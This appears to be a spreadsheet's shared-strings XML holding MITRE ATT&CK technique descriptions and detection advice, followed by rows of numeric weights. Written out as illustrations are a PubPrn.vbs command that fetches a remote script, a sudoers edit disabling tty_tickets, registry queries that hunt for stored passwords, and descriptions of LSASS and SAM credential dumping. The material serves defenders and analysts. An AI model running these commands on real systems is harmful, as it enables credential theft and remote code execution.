* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}&lt;/code&gt; that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the &lt;code&gt;DLL&lt;/code&gt; and &lt;code&gt;Function&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}&lt;/code&gt; that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, an adversary may have access to significant amounts of information about the target before conducting an operation, especially if the trusted relationship is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion.</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>Asset management,Data loss prevention</t>
  </si>
  <si>
    <t>Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. 
Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.</t>
  </si>
  <si>
    <t>Password Policy Discovery</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.</t>
  </si>
  <si>
    <t>Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). An adversary may attempt to access detailed information about the password policy used within an enterprise network. This would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
Password policies can be set and discovered on Windows, Linux, and macOS systems. (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)
### Windows
* &lt;code&gt;net accounts&lt;/code&gt;
* &lt;code&gt;net accounts /domain&lt;/code&gt;
### Linux
* &lt;code&gt;chage -l &lt;username&gt;&lt;/code&gt;
* &lt;code&gt;cat /etc/pam.d/common-password&lt;/code&gt;
### macOS
* &lt;code&gt;pwpolicy getaccountpolicies&lt;/code&gt;</t>
  </si>
  <si>
    <t>Indirect Command Execution</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>Anti-virus,System calls,Process monitoring</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office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</si>
  <si>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
Several types exist:
### Browser-based Exploitation
Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1192). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
### Office Applications
Common office and productivity applications such as Microsoft Office are also targeted through [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193), [Spearphishing Link](https://attack.mitre.org/techniques/T1192), and [Spearphishing via Service](https://attack.mitre.org/techniques/T1194). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.</t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t>Anti-virus,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Port Knocking</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.</t>
  </si>
  <si>
    <t>Port Knocking is a well-established method used by both defenders and adversaries to hide open ports from access. To enable a port, an adversary sends a series of packets with certain characteristics before the port will be opened. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports, but can involve unusual flags, specific strings or other unique characteristics. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. 
This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.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t>
  </si>
  <si>
    <t>defense-evasion,persistence,command-and-control</t>
  </si>
  <si>
    <t>Sudo Caching</t>
  </si>
  <si>
    <t>This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>The &lt;code&gt;sudo&lt;/code&gt; command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments." (Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a &lt;code&gt;timestamp_timeout&lt;/code&gt; that is the amount of time in minutes between instances of &lt;code&gt;sudo&lt;/code&gt; before it will re-prompt for a password. This is because &lt;code&gt;sudo&lt;/code&gt; has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at &lt;code&gt;/var/db/sudo&lt;/code&gt; with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a &lt;code&gt;tty_tickets&lt;/code&gt; variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
Adversaries can abuse poor configurations of this to escalate privileges without needing the user's password. &lt;code&gt;/var/db/sudo&lt;/code&gt;'s timestamp can be monitored to see if it falls within the &lt;code&gt;timestamp_timeout&lt;/code&gt; range. If it does, then malware can execute sudo commands without needing to supply the user's password. When &lt;code&gt;tty_tickets&lt;/code&gt; is disabled, adversaries can do this from any tty for that user. 
The OSX Proton Malware has disabled &lt;code&gt;tty_tickets&lt;/code&gt; to potentially make scripting easier by issuing &lt;code&gt;echo \'Defaults !tty_tickets\' &gt;&gt; /etc/sudoers&lt;/code&gt;  (Citation: cybereason osx proton). In order for this change to be reflected, the Proton malware also must issue &lt;code&gt;killall Terminal&lt;/code&gt;. As of macOS Sierra, the sudoers file has &lt;code&gt;tty_tickets&lt;/code&gt; enabled by default.</t>
  </si>
  <si>
    <t>DCShadow</t>
  </si>
  <si>
    <t>API monitoring,Authentication logs,Network protocol analysis,Packet capture</t>
  </si>
  <si>
    <t>Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) (Citation: BlueHat DCShadow Jan 2018) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). (Citation: BlueHat DCShadow Jan 2018) Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)
Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)
Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: BlueHat DCShadow Jan 2018)
Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.</t>
  </si>
  <si>
    <t>DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC). (Citation: DCShadow Blog) (Citation: BlueHat DCShadow Jan 2018) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)
This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1178) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) (Citation: BlueHat DCShadow Jan 2018)</t>
  </si>
  <si>
    <t>Kerberoasting</t>
  </si>
  <si>
    <t>Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]). (Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service (Citation: Microsoft Detecting Kerberoasting Feb 2018)). (Citation: Microsoft SPN) (Citation: Microsoft SetSPN) (Citation: SANS Attacking Kerberos Nov 2014) (Citation: Harmj0y Kerberoast Nov 2016)
Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). (Citation: Empire InvokeKerberoast Oct 2016) (Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials. (Citation: AdSecurity Cracking Kerberos Dec 2015) (Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)
This same attack could be executed using service tickets captured from network traffic. (Citation: AdSecurity Cracking Kerberos Dec 2015)
Cracked hashes may enable Persistence, Privilege Escalation, and  Lateral Movement via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). (Citation: SANS Attacking Kerberos Nov 2014)</t>
  </si>
  <si>
    <t>Time Providers</t>
  </si>
  <si>
    <t>API monitoring,Binary file metadata,DLL monitoring,File monitoring,Loaded DLLs,Process monitoring</t>
  </si>
  <si>
    <t>Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of  &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\&lt;/code&gt;. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>Windows Error Reporting,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the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</si>
  <si>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
An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046)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 (Citation: NVD CVE-2014-7169)
Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion</t>
  </si>
  <si>
    <t>Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.</t>
  </si>
  <si>
    <t>Exploitation of a software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Discovery](https://attack.mitre.org/techniques/T1063). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.</t>
  </si>
  <si>
    <t>Exploitation for Credential Access</t>
  </si>
  <si>
    <t>Authentication logs,Windows Error Reporting,Process monitoring</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.</t>
  </si>
  <si>
    <t>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access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions. (Citation: Technet MS14-068) (Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.</t>
  </si>
  <si>
    <t>Credentials in Registry</t>
  </si>
  <si>
    <t>Windows Registry,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.</t>
  </si>
  <si>
    <t>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
Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)
* Local Machine Hive: &lt;code&gt;reg query HKLM /f password /t REG_SZ /s&lt;/code&gt;
* Current User Hive: &lt;code&gt;reg query HKCU /f password /t REG_SZ /s&lt;/code&gt;</t>
  </si>
  <si>
    <t>Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>System calls,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>LKMs are typically loaded into &lt;code&gt;/lib/modules&lt;/code&gt; and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. 
These are typically obtained through the operating systems package manager and installed like a normal package.
Adversaries will likely run these commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview)
On Ubuntu and Debian based systems this can be accomplished by running: &lt;code&gt;apt-get install linux-headers-$(uname -r)&lt;/code&gt;
On RHEL and CentOS based systems this can be accomplished by running: &lt;code&gt;yum install kernel-devel-$(uname -r)&lt;/code&gt;
Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:&lt;code&gt;modprobe insmod lsmod rmmod modinfo&lt;/code&gt; (Citation: Linux Loadable Kernel Module Insert and Remove LKMs)
For macOS, monitor for execution of &lt;code&gt;kextload&lt;/code&gt; commands and correlate with other unknown or suspicious activity.</t>
  </si>
  <si>
    <t>Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)
Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)
Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through &lt;code&gt;kextload&lt;/code&gt; and &lt;code&gt;kextunload&lt;/code&gt; commands. Several examples have been found where this can be used. (Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken) Examples have been found in the wild. (Citation: Securelist Ventir)</t>
  </si>
  <si>
    <t>Signed Script Proxy Execution</t>
  </si>
  <si>
    <t>Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. (Citation: Enigma0x3 PubPrn Bypass) Example command: &lt;code&gt;cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png&lt;/code&gt;
There are several other signed scripts that may be used in a similar manner. (Citation: GitHub Ultimate AppLocker Bypass List)</t>
  </si>
  <si>
    <t>Browser Bookmark Discovery</t>
  </si>
  <si>
    <t>API monitoring,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086).
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t>
  </si>
  <si>
    <t>Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials in Files](https://attack.mitre.org/techniques/T1081) associated with logins cached by a browser.
Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution</t>
  </si>
  <si>
    <t>Remote Access Tools</t>
  </si>
  <si>
    <t>Network intrusion detection system,Network protocol analysis,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.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for the port that is being used.
[Domain Fronting](https://attack.mitre.org/techniques/T1172) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.</t>
  </si>
  <si>
    <t>An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote access tools may be established and used post-compromise as alternate communications channel for [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)</t>
  </si>
  <si>
    <t>XSL Script Processing</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Process use of network,DLL monitoring</t>
  </si>
  <si>
    <t>Template Injection</t>
  </si>
  <si>
    <t>Anti-virus,Email gateway,Network intrusion detection system,Web logs</t>
  </si>
  <si>
    <t>Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1086)), or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>Compiled HTML File</t>
  </si>
  <si>
    <t>Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.
Monitor presence and use of CHM files, especially if they are not typically used within an environment.</t>
  </si>
  <si>
    <t>Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
Adversaries may abuse this technology to conceal malicious code. A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)</t>
  </si>
  <si>
    <t>25;25;25;25</t>
  </si>
  <si>
    <t>20;20;30;30</t>
  </si>
  <si>
    <t>50;20;30</t>
  </si>
  <si>
    <t>35;30;35</t>
  </si>
  <si>
    <t>40;60</t>
  </si>
  <si>
    <t>15;23;22;15;25</t>
  </si>
  <si>
    <t>33;34;33</t>
  </si>
  <si>
    <t>35;25;40</t>
  </si>
  <si>
    <t>30;20;50</t>
  </si>
  <si>
    <t>20;20;20;20;20</t>
  </si>
  <si>
    <t>20;40;40</t>
  </si>
  <si>
    <t>40;30;30</t>
  </si>
  <si>
    <t>35;35;30</t>
  </si>
  <si>
    <t>30;20;25;25</t>
  </si>
  <si>
    <t>33;33;34</t>
  </si>
  <si>
    <t>8;8;8;8;8;9;10;8;9;8;8;8</t>
  </si>
  <si>
    <t>15;20;20;20;25</t>
  </si>
  <si>
    <t>30;30;20;20</t>
  </si>
  <si>
    <t>30;20;20;30</t>
  </si>
  <si>
    <t>20;15;15;15;15;20</t>
  </si>
  <si>
    <t>25;25;50</t>
  </si>
  <si>
    <t>45;55</t>
  </si>
  <si>
    <t>40;20;40</t>
  </si>
  <si>
    <t>30;30;15;25</t>
  </si>
  <si>
    <t>30;70</t>
  </si>
  <si>
    <t>30;30;30;10</t>
  </si>
  <si>
    <t>10;15;20;15;20;20</t>
  </si>
  <si>
    <t>35;65</t>
  </si>
  <si>
    <t>60;40</t>
  </si>
  <si>
    <t>10;20;35;35</t>
  </si>
  <si>
    <t>40;35;25</t>
  </si>
  <si>
    <t>16;16;16;17;18;17</t>
  </si>
  <si>
    <t>20;30;30;20</t>
  </si>
  <si>
    <t>30;30;40</t>
  </si>
  <si>
    <t>70;30</t>
  </si>
  <si>
    <t>Missing Techniques</t>
  </si>
  <si>
    <t>25;35;40</t>
  </si>
  <si>
    <t>33;30;37</t>
  </si>
  <si>
    <t>45;35;20</t>
  </si>
  <si>
    <t>30;40;30</t>
  </si>
  <si>
    <t>15;30;25;15;15</t>
  </si>
  <si>
    <t>10;15;20;20;15;10</t>
  </si>
  <si>
    <t>25;35;15;25</t>
  </si>
  <si>
    <t>65;35</t>
  </si>
  <si>
    <t>35;35;15;15</t>
  </si>
  <si>
    <t>15;25;40;20</t>
  </si>
  <si>
    <t>20;15;30;35</t>
  </si>
  <si>
    <t>25;20;35;20</t>
  </si>
  <si>
    <t>20;10;20;15;20;15</t>
  </si>
  <si>
    <t>30;20;30;20</t>
  </si>
  <si>
    <t>15;20;20;10;10;15;10</t>
  </si>
  <si>
    <t>15;20;20;15;10;20</t>
  </si>
  <si>
    <t>30;10;30;30</t>
  </si>
  <si>
    <t>40;25;35</t>
  </si>
  <si>
    <t>10;25;20;20;25</t>
  </si>
  <si>
    <t>25;15;20;15;25</t>
  </si>
  <si>
    <t>20;10;20;20;15;15</t>
  </si>
  <si>
    <t>40;40;20</t>
  </si>
  <si>
    <t>10;20;10;10;20;20;10</t>
  </si>
  <si>
    <t>10;30;30;30</t>
  </si>
  <si>
    <t>30;15;15;30;30</t>
  </si>
  <si>
    <t>45;30;25</t>
  </si>
  <si>
    <t>35;25;15;25</t>
  </si>
  <si>
    <t>30;35;35</t>
  </si>
  <si>
    <t>25;35;20;30</t>
  </si>
  <si>
    <t>25;30;20;25</t>
  </si>
  <si>
    <t>15;25;30;30</t>
  </si>
  <si>
    <t>20;30;50</t>
  </si>
  <si>
    <t>50;50</t>
  </si>
  <si>
    <t>15;10;20;5;20;15;15</t>
  </si>
  <si>
    <t>10;10;20;20;10;30</t>
  </si>
  <si>
    <t>20;20;10;20;15;15</t>
  </si>
  <si>
    <t>15;10;20;20;20;15</t>
  </si>
  <si>
    <t>30;15;30;25</t>
  </si>
  <si>
    <t>20;25;20;35</t>
  </si>
  <si>
    <t>15;15;15;20;20;15</t>
  </si>
  <si>
    <t>20;30;25;25</t>
  </si>
  <si>
    <t>10;20;20;10;10;15;15</t>
  </si>
  <si>
    <t>10;10;20;20;20;20</t>
  </si>
  <si>
    <t>25;35;20;20</t>
  </si>
  <si>
    <t>15;10;15;15;15;15;15</t>
  </si>
  <si>
    <t>20;10;20;10;20;20</t>
  </si>
  <si>
    <t>40;15;25;20</t>
  </si>
  <si>
    <t>Defense Bypassed</t>
  </si>
  <si>
    <t>### Windows
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. 
On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1086) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols  (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)
### Linux
